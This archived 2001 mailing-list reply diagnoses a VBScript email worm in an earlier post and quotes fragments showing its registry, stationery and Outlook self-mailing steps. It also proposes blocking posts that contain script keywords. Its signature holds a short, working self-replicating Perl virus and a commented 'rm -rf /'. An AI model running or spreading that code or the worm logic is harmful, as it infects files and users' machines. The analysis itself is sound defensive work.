Mail Archives: djgpp/2001/05/12/05:00:16
Javier Mendez <jmendez AT persystems DOT com> wrote:
[VBS virus]
Note to the poster:
GET A WORKING VIRUS SCANNER!!! YOU ARE INFECTED!!!
To anyone who has read the original message using Outlook or Outlook Express:
Get a working virus scanner! You might be infected.
To DJ Delorie:
Could you make your mailing list software reject posings containing JavaScript
or VBScript (these substrings may indicate this:
'JavaScript:'
'<SCRIPT'
'VBScript:'
or could you make the software automatically remove all HTML (interpret using
Lynx or some other HTML renderer) and only post plaintext?
Analysis:
> <HTML><HEAD>
> <Title> Help </Title></HEAD>
> <Body> <script language=3D'VBScript'>
[...]
> Rem I am sorry! happy time
May be a virus named 'happy time', I did not know it yet. But I can say what it
does:
> f1 =3D Rg(Ks & "Help\FileName")
It infects some windows help thing...
> If (CInt(Cn) Mod 366) =3D 0 Then
> If (CInt(Second(Time)) Mod 2) =3D 0 Then
> Tsend
> Else
> adds =3D Og
> Msend (adds)
> End If
> End If
> wp =3D Rg("HKEY_CURRENT_USER\Control Panel\desktop\wallPaper")
writes itself as active desktop wallpaper...
> MSH =3D oe & "\Message Send HTML"
> CUS =3D oe & "\Compose Use Stationery"
> SN =3D oe & "\Stationery Name"
> Rw MSH, 1
> Rw CUS, 1
> Rw SN, bf
writes itself as Outlook Express stationery...
does some harmful things (did not further analyze, but searches files and
does something on them)
> Set Oo =3D CreateObject("Outlook.Application")
and mails itself to anyone in his mailing list.
So the poster is just infected and had djgpp AT delorie DOT com in his address book.
--
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################
- Raw text -